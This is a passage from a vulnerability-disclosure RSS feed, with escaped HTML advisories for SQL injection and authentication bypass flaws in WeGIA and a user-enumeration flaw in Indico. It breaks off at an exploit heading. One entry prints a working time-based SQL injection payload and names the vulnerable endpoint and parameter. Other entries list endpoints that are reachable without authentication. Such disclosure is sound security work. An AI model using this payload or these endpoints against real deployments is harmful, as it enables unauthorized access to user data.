&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Wed, 16 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-53937</title>
        <link>https://www.cvehunters.com/p/cve-2025-53937/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-53937/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-53937-sql-injection-blind-time-based-vulnerability-in-cargo-parameter-on-controlphp-endpoint&amp;#34;&amp;gt;CVE-2025-53937: SQL Injection (Blind Time-Based) Vulnerability in &amp;lt;code&amp;gt;cargo&amp;lt;/code&amp;gt; Parameter on &amp;lt;code&amp;gt;control.php&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53937&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53937&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A SQL Injection vulnerability was discovered in the &amp;lt;code&amp;gt;cargo&amp;lt;/code&amp;gt; parameter of the &amp;lt;code&amp;gt;/controle/control.php&amp;lt;/code&amp;gt; endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly sanitize user-supplied input in the &amp;lt;code&amp;gt;cargo&amp;lt;/code&amp;gt; parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-53937-sql-injection-blind-time-based-vulnerability-in-cargo-parameter-on-controlphp-endpoint&amp;#34;&amp;gt;CVE-2025-53937: SQL Injection (Blind Time-Based) Vulnerability in &amp;lt;code&amp;gt;cargo&amp;lt;/code&amp;gt; Parameter on &amp;lt;code&amp;gt;control.php&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53937&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53937&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A SQL Injection vulnerability was discovered in the &amp;lt;code&amp;gt;cargo&amp;lt;/code&amp;gt; parameter of the &amp;lt;code&amp;gt;/controle/control.php&amp;lt;/code&amp;gt; endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly sanitize user-supplied input in the &amp;lt;code&amp;gt;cargo&amp;lt;/code&amp;gt; parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/controle/control.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;cargo&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;amp;#39; AND (SELECT 4207 FROM (SELECT(SLEEP(10)))bAsK) AND &amp;amp;#39;LOon&amp;amp;#39;=&amp;amp;#39;LOon
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;This payload introduces a time delay, demonstrating the ability to execute arbitrary SQL queries.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-53937/image.png&amp;#34;
	width=&amp;#34;915&amp;#34;
	height=&amp;#34;924&amp;#34;
	srcset=&amp;#34;/p/cve-2025-53937/image_hu_627764b08a014a29.png 480w, /p/cve-2025-53937/image_hu_9595da3164b60890.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;99&amp;#34;
		data-flex-basis=&amp;#34;237px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Observe the time delay in the server response, indicating the successful execution of the SQL payload.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Unauthorized access to sensitive data (e.g., users, passwords, logs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Database enumeration (schemas, tables, users, versions).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Escalation to RCE depending on DB configuration (e.g., xp_cmdshell, UDFs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Full compromise of the application if chained with other vulnerabilities.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;This issue affects all users and environments, as it does not require authentication and is reachable via a public endpoint.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-j3qv-v3m7-73pj&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-j3qv-v3m7-73pj&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;contributor&amp;#34;&amp;gt;Contributor
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Wed, 16 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-53938</title>
        <link>https://www.cvehunters.com/p/cve-2025-53938/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-53938/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-53938-authentication-bypass-due-to-missing-session-validation-in-multiple-endpoints&amp;#34;&amp;gt;CVE-2025-53938: Authentication Bypass due to Missing Session Validation in multiple endpoints
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53938&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53938&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;An &amp;lt;b&amp;gt;Authentication Bypass&amp;lt;/b&amp;gt; vulnerability was identified in the &amp;lt;code&amp;gt;/dao/verificar_recursos_cargo.php&amp;lt;/code&amp;gt; endpoint of the WeGia application. This vulnerability allows &amp;lt;b&amp;gt;unauthenticated users&amp;lt;/b&amp;gt; to access protected application functionalities and retrieve sensitive information by sending crafted HTTP requests &amp;lt;b&amp;gt;without any session cookies or authentication tokens&amp;lt;/b&amp;gt;.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;vulnerable-endpoints&amp;#34;&amp;gt;Vulnerable Endpoints:
&amp;lt;/h3&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;&amp;lt;code&amp;gt;/dao/verificar_recursos_cargo.php&amp;lt;/code&amp;gt;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;&amp;lt;code&amp;gt;/dao/exibir_cargo.php&amp;lt;/code&amp;gt;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;&amp;lt;code&amp;gt;/dao/verificar_modulos_visiveis.php&amp;lt;/code&amp;gt;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;&amp;lt;code&amp;gt;/dao/exibir_documento.php&amp;lt;/code&amp;gt;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;&amp;lt;code&amp;gt;/dao/adicionar_documento.php&amp;lt;/code&amp;gt;&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;authentication-required&amp;#34;&amp;gt;Authentication Required:
&amp;lt;/h3&amp;gt;&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;❌ No&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-53938/image.png&amp;#34;
	width=&amp;#34;1058&amp;#34;
	height=&amp;#34;749&amp;#34;
	srcset=&amp;#34;/p/cve-2025-53938/image_hu_e3306e3cf65cbbc2.png 480w, /p/cve-2025-53938/image_hu_50392cb7cd1239e4.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;141&amp;#34;
		data-flex-basis=&amp;#34;339px&amp;#34;
	
&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-53938-authentication-bypass-due-to-missing-session-validation-in-multiple-endpoints&amp;#34;&amp;gt;CVE-2025-53938: Authentication Bypass due to Missing Session Validation in multiple endpoints
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53938&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53938&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;An &amp;lt;b&amp;gt;Authentication Bypass&amp;lt;/b&amp;gt; vulnerability was identified in the &amp;lt;code&amp;gt;/dao/verificar_recursos_cargo.php&amp;lt;/code&amp;gt; endpoint of the WeGia application. This vulnerability allows &amp;lt;b&amp;gt;unauthenticated users&amp;lt;/b&amp;gt; to access protected application functionalities and retrieve sensitive information by sending crafted HTTP requests &amp;lt;b&amp;gt;without any session cookies or authentication tokens&amp;lt;/b&amp;gt;.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;vulnerable-endpoints&amp;#34;&amp;gt;Vulnerable Endpoints:
&amp;lt;/h3&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;&amp;lt;code&amp;gt;/dao/verificar_recursos_cargo.php&amp;lt;/code&amp;gt;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;&amp;lt;code&amp;gt;/dao/exibir_cargo.php&amp;lt;/code&amp;gt;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;&amp;lt;code&amp;gt;/dao/verificar_modulos_visiveis.php&amp;lt;/code&amp;gt;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;&amp;lt;code&amp;gt;/dao/exibir_documento.php&amp;lt;/code&amp;gt;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;&amp;lt;code&amp;gt;/dao/adicionar_documento.php&amp;lt;/code&amp;gt;&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;authentication-required&amp;#34;&amp;gt;Authentication Required:
&amp;lt;/h3&amp;gt;&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;❌ No&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-53938/image.png&amp;#34;
	width=&amp;#34;1058&amp;#34;
	height=&amp;#34;749&amp;#34;
	srcset=&amp;#34;/p/cve-2025-53938/image_hu_e3306e3cf65cbbc2.png 480w, /p/cve-2025-53938/image_hu_50392cb7cd1239e4.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;141&amp;#34;
		data-flex-basis=&amp;#34;339px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The lack of session validation in this endpoint can lead to several security risks:&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;&amp;lt;b&amp;gt;Unauthorized Data Exposure:&amp;lt;/b&amp;gt; Unauthenticated users can enumerate or retrieve sensitive internal data.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;&amp;lt;b&amp;gt;Privilege Escalation:&amp;lt;/b&amp;gt; Attackers might access or infer information intended only for authorized users.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;&amp;lt;b&amp;gt;Information Disclosure:&amp;lt;/b&amp;gt; Business logic and internal IDs (like user roles or permissions) can be leaked.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;&amp;lt;b&amp;gt;Reconnaissance Support:&amp;lt;/b&amp;gt; Facilitates attackers in mapping backend structures for more targeted attacks.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-6p76-7mm4-j5rj&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-6p76-7mm4-j5rj&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;contributor&amp;#34;&amp;gt;Contributor
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Wed, 16 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-53640</title>
        <link>https://www.cvehunters.com/p/cve-2025-53640/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-53640/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-53640-user-enumeration-via-api-endpoint&amp;#34;&amp;gt;CVE-2025-53640: User enumeration via API endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53640&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53640&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;a Broken Object Level Authorization (BOLA) vulnerability in Indico enables authenticated user enumeration via the &amp;lt;code&amp;gt;/api/principals&amp;lt;/code&amp;gt; endpoint, exposing names, emails, and affiliations. Includes exploitation script, request analysis, and screenshots. Affects globally deployed Indico instances (European Organization for Nuclear Research (CERN), United Nations (UN), Massachusetts Institute of Technology (MIT), European Space Agency (ESA), among others).&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt; A Broken Object Level Authorization (BOLA) vulnerability in the open-source application Indico allows mass user enumeration through the &amp;lt;code&amp;gt;/api/principals&amp;lt;/code&amp;gt; endpoint.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;Originally intended to resolve user IDs in specific form fields, this endpoint can be misused to retrieve personal details of &amp;lt;b&amp;gt;any valid user ID:&amp;lt;/b&amp;gt;&amp;lt;br&amp;gt;
  &amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Full name&amp;lt;/li&amp;gt;
  &amp;lt;li&amp;gt;Email address&amp;lt;/li&amp;gt;
  &amp;lt;li&amp;gt;Title&amp;lt;/li&amp;gt;
  &amp;lt;li&amp;gt;Affiliation&amp;lt;/li&amp;gt;
  &amp;lt;li&amp;gt;Avatar URL&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-53640-user-enumeration-via-api-endpoint&amp;#34;&amp;gt;CVE-2025-53640: User enumeration via API endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53640&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53640&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;a Broken Object Level Authorization (BOLA) vulnerability in Indico enables authenticated user enumeration via the &amp;lt;code&amp;gt;/api/principals&amp;lt;/code&amp;gt; endpoint, exposing names, emails, and affiliations. Includes exploitation script, request analysis, and screenshots. Affects globally deployed Indico instances (European Organization for Nuclear Research (CERN), United Nations (UN), Massachusetts Institute of Technology (MIT), European Space Agency (ESA), among others).&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt; A Broken Object Level Authorization (BOLA) vulnerability in the open-source application Indico allows mass user enumeration through the &amp;lt;code&amp;gt;/api/principals&amp;lt;/code&amp;gt; endpoint.&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;Originally intended to resolve user IDs in specific form fields, this endpoint can be misused to retrieve personal details of &amp;lt;b&amp;gt;any valid user ID:&amp;lt;/b&amp;gt;&amp;lt;br /&amp;gt;
  &amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Full name&amp;lt;/li&amp;gt;
  &amp;lt;li&amp;gt;Email address&amp;lt;/li&amp;gt;
  &amp;lt;li&amp;gt;Title&amp;lt;/li&amp;gt;
  &amp;lt;li&amp;gt;Affiliation&amp;lt;/li&amp;gt;
  &amp;lt;li&amp;gt;Avatar URL&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;exploitation-requirements&amp;#34;&amp;gt;Exploitation Requirements
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;A valid authenticated session is required.&amp;lt;/li&amp;gt;
  &amp;lt;li&amp;gt;However, most public Indico instances allow self-registration with no email verification, CAPTCHA, or manual approval.&amp;lt;/li&amp;gt;
  &amp;lt;li&amp;gt;This makes the vulnerability &amp;lt;b&amp;gt;practically exploitable by unauthenticated users&amp;lt;/b&amp;gt; after trivial account creation.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;exploit&amp;#34;&amp;gt;Exploit
